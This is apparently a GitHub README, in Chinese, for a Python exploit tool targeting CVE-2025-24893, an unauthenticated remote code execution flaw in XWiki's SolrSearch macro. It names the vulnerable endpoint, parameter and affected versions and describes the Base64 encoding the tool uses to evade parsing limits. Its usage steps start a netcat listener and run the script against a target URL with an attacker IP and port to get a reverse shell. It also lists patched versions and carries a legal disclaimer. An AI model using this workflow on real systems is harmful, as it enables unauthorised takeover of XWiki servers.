hasecto/CVE-2025-24893

GitHub: hasecto/CVE-2025-24893

针对 XWiki 平台 CVE-2025-24893 未经身份验证远程代码执行漏洞的自动化 exploit 工具。

Stars: 0 | Forks: 0

# CVE-2025-24893 XWiki 远程代码执行 (RCE) Exploit 这是一个用于 **CVE-2025-24893** 的 Python3 exploit,该漏洞是影响 **XWiki** 平台的一个严重的未经身份验证的远程代码执行 (RCE) 漏洞。 该脚本利用了 `SolrSearch` macro 组件中的代码/表达式注入 (CWE-95) 漏洞。该漏洞允许攻击者在底层操作系统上执行任意的 Groovy/Java 代码。该 exploit 会自动进行 Base64 编码,以规避 Java 的 `Runtime.getRuntime().exec()` 函数在解析命令时的限制。 ## 📊 漏洞详情 - **CVE ID:** CVE-2025-24893 - **CVSS 评分:** 9.8 严重 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) - **CWE:** CWE-95 (表达式语言表达式的不正确中和 / Eval 注入) - **目标组件:** `/bin/get/Main/SolrSearch` (通过 `text` 参数) ## 🔍 受影响版本 - 从 **5.3-milestone-2** 到 **15.10.10** 的所有版本 - 从 **16.0.0-rc-1** 到 **16.4.0** 的版本 ## 🚀 使用方法 ### 1. 在 Kali Linux 上启动你的监听器 (Netcat): ``` nc -lvnp 4444 ``` ### 2. 执行 exploit: ``` python3 CVE-2025-24-893.py ``` **示例:** ``` python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444 ``` ## 🛠️ 前置条件 - Python 3.x - `requests` 库 安装所需的依赖项: ``` pip install requests ``` ## 🛡️ 修复方案 将你的 XWiki 实例更新至以下任一官方修复版本:**15.10.11**、**16.4.1**、**16.5.0-rc-1** (或更高版本)。 ## ⚠️ 免责声明 此脚本仅供教育目的、授权的安全审计和渗透测试 (Pentest) 使用。作者不对因使用此工具而导致的任何滥用、损害或非法活动负责。未经事先授权将此脚本用于攻击目标是严格违法的。
标签:逆向工具